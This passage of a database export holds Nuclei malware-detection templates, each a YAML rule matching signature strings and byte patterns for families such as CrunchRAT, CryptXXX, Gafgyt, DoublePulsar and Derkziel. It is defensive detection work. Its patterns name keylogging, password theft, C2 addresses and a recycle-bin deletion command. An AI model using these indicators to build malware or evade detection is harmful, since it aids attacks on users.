extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"Ypmw1Syv023QZD\"\n - \"wZ2pla\"\n - \"wBmpf3Pb7RJe\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \"cerberus\"\n case-insensitive: true\n\n# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950\n", "hash": "56a652c040b2fac9ccd4d894506db3b6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d82" }, "name": "clientmesh-malware.yaml", "content": "id: clientmesh-malware\n\ninfo:\n name: ClientMesh Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"machinedetails\"\n - \"MySettings\"\n - \"sendftppasswords\"\n - \"sendbrowserpasswords\"\n - \"arma2keyMass\"\n - \"keylogger\"\n condition: and\n\n - type: binary\n binary:\n - \"0000000000000000007E\"\n\n# digest: 4a0a00473045022100ad978f9cce613b41cec0b9bfcbccb89b8e5525ba0f9717e3b68b3c74a0a12588022005886883415cdd79b437a4df3a16fbc34eb2f5d9bc66b400274f379e44fa27c5:922c64590222798bb761d5b6d8e72950\n", "hash": "ce8f4be607626e3dece7aa5c7f1ad205", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d83" }, "name": "crimson-malware.yaml", "content": "id: crimson-malware\n\ninfo:\n name: Crimson Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Crimson.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"com/crimson/PK\"\n - \"com/crimson/bootstrapJar/PK\"\n - \"com/crimson/permaJarMulti/PermaJarReporter$1.classPK\"\n - 
\"com/crimson/universal/containers/KeyloggerLog.classPK\"\n - \"com/crimson/universal/UploadTransfer.classPK\"\n condition: and\n\n# digest: 4a0a0047304502201aca2f60909bc78a6b817e7ec9f4cc6729f9c7bdebd09dd2a06424bd2e0d9cf9022100a46b5beb11bcdb8be397a0022dd14160bd17e8a8467b600daefd1c205f271319:922c64590222798bb761d5b6d8e72950\n", "hash": "a89e8cabfb019d3848a6f05b52997262", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d84" }, "name": "crunchrat-malware.yaml", "content": "id: crunchrat-malware\n\ninfo:\n name: CrunchRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara\n tags: malware,file,crunchrat\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"command\"\n - \"upload\"\n - \"download\"\n - \"cmd.exe\"\n - \"application/x-www-form-urlencoded\"\n - \"&action=\"\n - \"&secondary=\"\n - \"\"\n - \"\"\n condition: and\n case-insensitive: true\n\n# digest: 4a0a0047304502207f75542fcb07f843be7d316303c3dd5eaa2343dc52f018ffc21a16d11e7e7eed022100dba2448549754113fd319716df8f27825011101f6909f36aa8beed10abfe7e05:922c64590222798bb761d5b6d8e72950\n", "hash": "32000f0afc9d102b7b98ce44c79bcff9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d85" }, "name": "cryptxxx-dropper-malware.yaml", "content": "id: cryptxxx-dropper-malware\n\ninfo:\n name: CryptXXX Dropper Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"50653157584346765962486F35\"\n - \"43003A005C0042004900450052005C0051006D006B004E0052004C00460000\"\n condition: and\n\n# digest: 
4a0a00473045022100bdc14952eb8408ad1757d3a386ecab4617d7f3e5d4287292e8018aced2e61ede022053c9b5781dafb7dfb014d0e0a018b99ce5e1515a4a8800c254094c90eb65c454:922c64590222798bb761d5b6d8e72950\n", "hash": "be95fc80b61e17c57cdbd8772cedccf9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d86" }, "name": "cryptxxx-malware.yaml", "content": "id: cryptxxx-malware\n\ninfo:\n name: CryptXXX Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"525947404A41595D52000000FFFFFFFF\"\n - \"0600000052594740405A0000FFFFFFFF\"\n - \"0A000000525C4B4D574D424B5C520000\"\n - \"FFFFFFFF0A000000525D575D5A4B4370\"\n - \"3F520000FFFFFFFF06000000524C4141\"\n - \"5A520000FFFFFFFF0A000000525C4B4D\"\n - \"41584B5C57520000FFFFFFFF0E000000\"\n - \"522A5C4B4D574D424B204C4740520000\"\n - \"FFFFFFFF0A000000525E4B5C48424149\"\n - \"5D520000FFFFFFFF05000000524B4847\"\n - \"52000000FFFFFFFF0C000000524D4140\"\n - \"48474920435D475200000000FFFFFFFF\"\n - \"0A000000525E5C41495C4F703F520000\"\n - \"FFFFFFFF0A000000525E5C41495C4F70\"\n - \"3C520000FFFFFFFF0800000052494141\"\n - \"49424B5200000000FFFFFFFF06000000\"\n - \"525A4B435E520000FFFFFFFF08000000\"\n - \"52483A4C4D703F5200000000FFFFFFFF\"\n - \"0A000000524F42425B5D4B703F520000\"\n - \"FFFFFFFF0A000000525E5C41495C4F70\"\n - \"3F520000FFFFFFFF0A000000525E5C41\"\n - \"495C4F703C520000FFFFFFFF09000000\"\n - \"524F5E5E4A4F5A4F52000000FFFFFFFF\"\n - \"0A000000525E5C41495C4F703D520000\"\n - \"FFFFFFFF08000000525E5B4C42474D52\"\n condition: and\n\n# digest: 490a0046304402200be06227894be466ece6600d08b5c21ffe0a1c04d8297f5fd684fc66fa64f0d202203f57a1271be83715b3953f3fcc4fd08dd1d2db57240cfd5fc9a9611008574bf9:922c64590222798bb761d5b6d8e72950\n", "hash": "51eef0bc95b01fdaf494725c4f75628a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf307d87" }, "name": "cxpid-malware.yaml", "content": "id: cxpid-malware\n\ninfo:\n name: Cxpid Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cxpid.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - '/cxpid/submit.php?SessionID='\n - '/cxgid/'\n - 'E21BC52BEA2FEF26D005CF'\n - 'E21BC52BEA39E435C40CD8'\n - ' -,L-,O+,Q-,R-,Y-,S-'\n\n - type: binary\n binary:\n - \"558BECB9380400006A006A004975F9\"\n\n# digest: 4b0a00483046022100a74a127323c94ac22930026e66dd642dd77e020a5196c7595f654c18025ff3c3022100d1b6de3cb0908fd76b6556d63cd1a4b9208813f689c9e870cb1a83c55ba41970:922c64590222798bb761d5b6d8e72950\n", "hash": "3bfbfd9741e12094f6d0c3a75f98210f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d88" }, "name": "cythosia-malware.yaml", "content": "id: cythosia-malware\n\ninfo:\n name: Cythosia Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cythosia.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'HarvesterSocksBot.Properties.Resources'\n\n# digest: 490a00463044022078ad40bfbd1ef70b1a2d5f012e6f7e22f0c147b4622d3fb20bd95dca173ba3cd02207c1fd648ffed2e553b8f2d4fab5e3610c84cd330b9ec5bfcfdd6798fffcfbc68:922c64590222798bb761d5b6d8e72950\n", "hash": "38f8ac98ca26c17c9ba8c5b4d86cca76", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d89" }, "name": "darkrat-malware.yaml", "content": "id: darkrat-malware\n\ninfo:\n name: DarkRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 
\"@1906dark1996coder@\"\n - \"SHEmptyRecycleBinA\"\n - \"mciSendStringA\"\n - \"add_Shutdown\"\n - \"get_SaveMySettingsOnExit\"\n - \"get_SpecialDirectories\"\n - \"Client.My\"\n condition: and\n\n# digest: 4b0a00483046022100b1285934cddc122f08b2b6076c401a94b5fada0579234b74bc87843121e15968022100b9ac1f7a35c4b00c9cdf22c8eb46cc6b2612b90f2cf9ff89e93589db08e7139c:922c64590222798bb761d5b6d8e72950\n", "hash": "c277a3d95b2658ddf211cbb85d0c69da", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8a" }, "name": "ddostf-malware.yaml", "content": "id: ddostf-malware\n\ninfo:\n name: DDoSTf Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DDoSTf.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - 'ddos.tf'\n - 'Accept-Language: zh'\n - '%d Kb/bps|%d%%'\n condition: and\n\n - type: binary\n binary:\n - 'E8AEBEE7BDAE5443505F4B454550494E54564CE99499E8AFAFEFBC9A00'\n - 'E8AEBEE7BDAE5443505F4B454550434E54E99499E8AFAFEFBC9A00'\n condition: and\n\n# digest: 490a00463044022069c37b9b0b031a463f234c65dabef2ccf82eafbbf75453e3742a81fd59e4e222022050ab2c041ae193aa639c9d0bce242bee402c7c1f3edce808308c9eca74636193:922c64590222798bb761d5b6d8e72950\n", "hash": "2a11c9be84a497948ec7ab1ac6332a39", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8b" }, "name": "derkziel-malware.yaml", "content": "id: derkziel-malware\n\ninfo:\n name: Derkziel Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://bhf.su/threads/137898/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Derkziel.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - '{!}DRZ{!}'\n - 'User-Agent: Uploador'\n - 
'SteamAppData.vdf'\n - 'loginusers.vdf'\n - 'config.vdf'\n condition: and\n\n# digest: 4a0a0047304502200d170fa9be481ceece013efa9f03701a25bf9a54312e54f49af20ff8e0005e7d02210083a9bad344313d9eca866ea080d3d24f1fce9d2dc5d75e94b83f2a3d25b8931e:922c64590222798bb761d5b6d8e72950\n", "hash": "a15ebe498b42680b2ad037d1b4692627", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8c" }, "name": "dexter-malware.yaml", "content": "id: dexter-malware\n\ninfo:\n name: Dexter Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Dexter.yar\n - http://goo.gl/oBvy8b\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Java Security Plugin'\n - '%s\\\\%s\\\\%s.exe'\n - 'Sun Java Security Plugin'\n - '\\\\Internet Explorer\\\\iexplore.exe'\n condition: and\n\n# digest: 4b0a00483046022100a9287ff95aaf311e7c3268c65e993cb4467bfbb081b6232136aa8d2dc9deea78022100b630b834786bcd6d95a436f09629e6cb330112f7306659b2a36cba93f3203811:922c64590222798bb761d5b6d8e72950\n", "hash": "9bc0ceb82e681a1bfd8e527f67870e90", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8d" }, "name": "diamondfox-malware.yaml", "content": "id: diamondfox-malware\n\ninfo:\n name: DiamondFox Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DiamondFox.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'UPDATE_B'\n - 'UNISTALL_B'\n - 'S_PROTECT'\n - 'P_WALLET'\n - 'GR_COMMAND'\n - 'FTPUPLOAD'\n condition: and\n\n# digest: 490a0046304402207f1d1ad5c528eb43a5ae2b867941575a1a1cd0461e18acc4b4ac3b88aa9da21f0220311924a7023fe7f690e204eeeec7e950603025abe55859c4af9c0281ab0f79a1:922c64590222798bb761d5b6d8e72950\n", "hash": "c060bd322242ab6e1ef90c26a3dc192c", "level": 2, "time": "2024-05-17 23:39:44" }, { 
"_id": { "$oid": "66477a413521042ccf307d8e" }, "name": "dmalocker-malware.yaml", "content": "id: dmalocker-malware\n\ninfo:\n name: DMA Locker Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DMALocker.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"41424358595a3131\"\n - \"21444d414c4f434b\"\n - \"21444d414c4f434b332e30\"\n - \"3F520000FFFFFFFF06000000524C4141\"\n - \"21444d414c4f434b342e30\"\n condition: or\n\n# digest: 490a00463044022019324b8f2ca02cf489e2b4b3b73d8fac28ea13d959460ce3da76a6dc9ea737b802205bb006cd82e5d13d91ac173c0e207961f79364f6205dddb16765ce48f0e43258:922c64590222798bb761d5b6d8e72950\n", "hash": "67bda4194712cfe0c32e2cd35e00b081", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8f" }, "name": "doublepulsar-malware.yaml", "content": "id: doublepulsar-malware\n\ninfo:\n name: DoublePulsar Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DoublePulsar_Petya.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"FD0C8C5CB8C424C5CCCCCC0EE8CC246BCCCCCC0F24CDCCCCCC275C9775BACDCCCCC3FE\"\n - \"45208D938D928D918D90929391970F9F9E9D99844529844D20CCCDCCCC9B844503844514844549CC3333332477CCCCCC844549C43333332484CDCCCC844549DC333333844749CC333333844741\"\n condition: or\n\n# digest: 4b0a00483046022100fecba2c76000ce4dc747b32d5a6c2db3b0fc1153f64c279ad5f81dc6f68ad056022100fc9cbbcfa1a0cec80ecef08d1a0d0b541d4154be1961c02789d91642a57604e4:922c64590222798bb761d5b6d8e72950\n", "hash": "fad7a3ad0914f47d32ba4ea14ba9b14e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d90" }, "name": "eicar-malware.yaml", "content": "id: eicar-malware\n\ninfo:\n name: Eicar Malware - Detect\n author: daffainfo\n severity: info\n reference: 
https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Eicar.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*\"\n\n# digest: 4a0a0047304502207975a5baa7107c29fa43d0d09d14a1f330d75cc2c90e7e2959de621616bd920c022100aab3bdba5f0777409100b22da60d51f2bca3a630df47a3e1335c29d9eebacb7b:922c64590222798bb761d5b6d8e72950\n", "hash": "55703247fd4bab9254b07a85cac7927b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d91" }, "name": "erebus-malware.yaml", "content": "id: erebus-malware\n\ninfo:\n name: Erebus Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Erebus.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log\"\n - \"EREBUS IS BEST.\"\n condition: and\n\n# digest: 4a0a00473045022100b2c9308c6baa68c3f36be6375b9d4a08cbee7b2b76334063f64375c58a584c1a022014e00fe5cedabd573b20e277bfef437e04d245b551f692e451eea6a13297d093:922c64590222798bb761d5b6d8e72950\n", "hash": "2e41b8480e215dcaacf4284f7d0a0061", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d92" }, "name": "ezcob-malware.yaml", "content": "id: ezcob-malware\n\ninfo:\n name: Ezcob Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Ezcob.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - '\\x12F\\x12F\\x129\\x12E\\x12A\\x12E\\x12B\\x12A\\x12-\\x127\\x127\\x128\\x123\\x12'\n - '\\x121\\x12D\\x128\\x123\\x12B\\x122\\x12E\\x128\\x12-\\x12B\\x122\\x123\\x12D\\x12'\n - 'Ezcob'\n - 'l\\x12i\\x12u\\x122\\x120\\x121\\x123\\x120\\x124\\x121\\x126'\n - '20110113144935'\n condition: or\n\n# digest: 
4b0a00483046022100d6413aad4692251618745a1305877e38ef6a0265199e5593006c6941238b5727022100f9b2270f44ab1e5a8aab94ad046274a148e26d8b9357279e8a3bf2d38218ebc6:922c64590222798bb761d5b6d8e72950\n", "hash": "2f586449c1728490111fc3b52e1e412a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d93" }, "name": "fudcrypt-malware.yaml", "content": "id: fudcrypt-malware\n\ninfo:\n name: FUDCrypt Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/gigajew/FudCrypt/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FUDCrypt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'OcYjzPUtJkNbLOABqYvNbvhZf'\n - 'gwiXxyIDDtoYzgMSRGMckRbJi'\n - 'BclWgISTcaGjnwrzSCIuKruKm'\n - 'CJyUSiUNrIVbgksjxpAMUkAJJ'\n - 'fAMVdoPUEyHEWdxQIEJPRYbEN'\n - 'CIGQUctdcUPqUjoucmcoffECY'\n - 'wcZfHOgetgAExzSoWFJFQdAyO'\n - 'DqYKDnIoLeZDWYlQWoxZnpfPR'\n - 'MkhMoOHCbGUMqtnRDJKnBYnOj'\n - 'sHEqLMGglkBAOIUfcSAgMvZfs'\n - 'JtZApJhbFAIFxzHLjjyEQvtgd'\n - 'IIQrSWZEMmoQIKGuxxwoTwXka'\n\n# digest: 4a0a004730450220551ad1f48b67447105de1dfeb2283e4894300d7a04b4f462ded8efb032531660022100fd607a6ae4731a63a068a4047c8d8f3b51f4f398e8c00da9c90123662ac275c6:922c64590222798bb761d5b6d8e72950\n", "hash": "8929399efb32c48a5a4dc1c298402211", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d94" }, "name": "gafgyt-bash-malware.yaml", "content": "id: gafgyt-bash-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PONG!'\n - 'GETLOCALIP'\n - 'HTTPFLOOD'\n - 'LUCKYLILDUDE'\n condition: and\n\n# digest: 
490a004630440220288713ec4bd6977eff7ff75df4f036ef52f817f9dfe2e40dd236505b71a6b3fe02202a06c8127b4cf5382386c17d9314bc3cbd4ebc39f573cfd5c4048b416bef314c:922c64590222798bb761d5b6d8e72950\n", "hash": "c4b00d1a855e9a771761fc85455f5020", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d95" }, "name": "gafgyt-generic-malware.yaml", "content": "id: gafgyt-generic-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"/bin/busybox;echo -e 'gayfgt'\"\n - '/proc/net/route'\n - 'admin'\n - 'root'\n condition: and\n\n# digest: 4a0a00473045022100a436723552485c6e8cc638338d9303400a69c5e8dc1e1e9e57a1376af7cb4cee02203fce2be6541cb69686c31e611bb3800f4e3eb94eda45d82679d7e336e96a78ec:922c64590222798bb761d5b6d8e72950\n", "hash": "2ff7fd8f58f80babb618f9f75165345d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d96" }, "name": "gafgyt-hihi-malware.yaml", "content": "id: gafgyt-hihi-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PING'\n - 'PONG'\n - 'TELNET LOGIN CRACKED - %s:%s:%s'\n - 'ADVANCEDBOT'\n - '46.166.185.92'\n - 'LOLNOGTFO'\n condition: and\n\n# digest: 4a0a0047304502202b4ae96e807e07b5a92453399994ce2d360a5262c5f42de79da60ca5e61ffdf9022100e101b40699838926c53e2672358afec4eb70034f8057f3139d9471d06218d0ec:922c64590222798bb761d5b6d8e72950\n", "hash": "a6ab2a24e733973e8fdc2cc8f4cdee84", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d97" }, "name": "gafgyt-hoho-malware.yaml", "content": "id: gafgyt-hoho-malware\n\ninfo:\n name: 
Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PING'\n - 'PRIVMSG'\n - 'Remote IRC Bot'\n - '23.95.43.182'\n condition: and\n\n# digest: 490a0046304402204caa36b7085382217c68b836ba02e409b7a9d1cc06a53445152789adaa6c8d5e02204838d1ce8e133534ecaeb957858422d28886ab366b5d0cdfa3aabfb343e3f83a:922c64590222798bb761d5b6d8e72950\n", "hash": "8b7a52b6db0e97ea7acf065b34a35759", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d98" }, "name": "gafgyt-jackmy-malware.yaml", "content": "id: gafgyt-jackmy-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PING'\n - 'PONG'\n - 'jackmy'\n - '203.134.%d.%d'\n condition: and\n\n# digest: 4b0a004830460221009f75b155ff1a6cf0f9a2e515fbefc0ee6844cabc036c2f3d06c74a219756f795022100fba0315b774cdd5dd17543a17c7a5b57ed9926583ffb40b32e940bd6b1407968:922c64590222798bb761d5b6d8e72950\n", "hash": "447c07fb5d5aeca0e536fc77d07c00d8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d99" }, "name": "gafgyt-oh-malware.yaml", "content": "id: gafgyt-oh-malware\n\ninfo:\n name: Gafgyt Oh Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'busyboxterrorist'\n - 'BOGOMIPS'\n - '124.105.97.%d'\n - 'fucknet'\n condition: and\n\n# digest: 
4a0a0047304502203cc1627cee509aef93e68476939f3d1e2fc7371357a73b47ed730dc272ed7d56022100f4d1eeddad80745d41b9eb5c1c9cb7b661d8d764628eaa2b21bba7a5abf0bcda:922c64590222798bb761d5b6d8e72950\n", "hash": "c2acc75835f6b733b62a2af432702f9d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9a" }, "name": "genome-malware.yaml", "content": "id: genome-malware\n\ninfo:\n name: Genome Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Genome.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Attempting to create more than one keyboard::Monitor instance'\n - '{Right windows}'\n - 'Access violation - no RTTI data!'\n condition: and\n\n# digest: 4b0a004830460221008e67d4a702001206e2838ed87a09a2d6dc3a0a423643a3b19fab912895944d3c022100d8d561eda4eb5f713345d6e04db0b1f2e27daa13009c62a27c9ee08888f91b23:922c64590222798bb761d5b6d8e72950\n", "hash": "c80977fdacfceacf29e51781139bda6b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9b" }, "name": "glass-malware.yaml", "content": "id: glass-malware\n\ninfo:\n name: Glass Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Glass.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"PostQuitMessage\"\n - \"pwlfnn10,gzg\"\n - \"update.dll\"\n - \"_winver\"\n condition: and\n\n# digest: 4b0a00483046022100fcc6a253c1cdfca1770ded4ccd721e5afc7ed561be162c18d0f614b63ae0efcf022100e1a58b609f151bbaa49837795a9f58a042d7c54b320bd63841a558743c131d6f:922c64590222798bb761d5b6d8e72950\n", "hash": "b017d9188aaf10165c80c8b522cf6997", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9c" }, "name": "glasses-malware.yaml", "content": "id: glasses-malware\n\ninfo:\n name: Glasses Malware - 
Detect\n author: daffainfo\n severity: info\n reference:\n - https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Glasses.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - 'thequickbrownfxjmpsvalzydg'\n - 'Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)'\n - '\" target=\"NewRef\">'\n condition: and\n\n - type: binary\n binary:\n - \"B8ABAAAAAAF7E1D1EA8D04522BC8\"\n - \"B856555555F7E98B4C241C8BC2C1E81F03D0493BCA\"\n condition: or\n\n# digest: 490a0046304402206c19fd7664b98e1beacc91b5cefd899284e3b9db9a5496b2d1b8c11ad06ee77e02204d59c759c20e30834d429d754f136bc7b70d841a6c2e128611028841235f1a8f:922c64590222798bb761d5b6d8e72950\n", "hash": "0b528bb5cb0c6e6390050cdc964bce7a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9d" }, "name": "gozi-malware.yaml", "content": "id: gozi-malware\n\ninfo:\n name: Gozi Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gozi.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500\"\n\n# digest: 4a0a004730450220461dc17288917677ebacf3d4c6deda849d7ed8ff2fe3359d83699d44a161bee402210093eea6ed3ce4a7a060970f7c6ccf74ccf21072494021cf544172d346785bba79:922c64590222798bb761d5b6d8e72950\n", "hash": "22205dd393a0d8566ebd3adc53a44471", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9e" }, "name": "gpgqwerty-malware.yaml", "content": "id: gpgqwerty-malware\n\ninfo:\n name: GPGQwerty Malware - Detect\n author: daffainfo\n severity: info\n reference: 
https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_GPGQwerty.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"gpg.exe –recipient qwerty -o\"\n - \"%s%s.%d.qwerty\"\n - \"del /Q /F /S %s$recycle.bin\"\n - \"cryz1@protonmail.com\"\n condition: and\n\n# digest: 4a0a00473045022075d6b8b24de31fa7102eb77cb2017df3222bd2503952eccfc5b2df8b0050602c02210099773f7ad192a738d66c6158fe6c3ed780b2853160405731d3e392ca415001c9:922c64590222798bb761d5b6d8e72950\n", "hash": "c36e9f1b3c5f6d90128ebd8c62b1340e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9f" }, "name": "greame-malware.yaml", "content": "id: greame-malware\n\ninfo:\n name: Greame Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"EditSvr\"\n - \"TLoader\"\n - 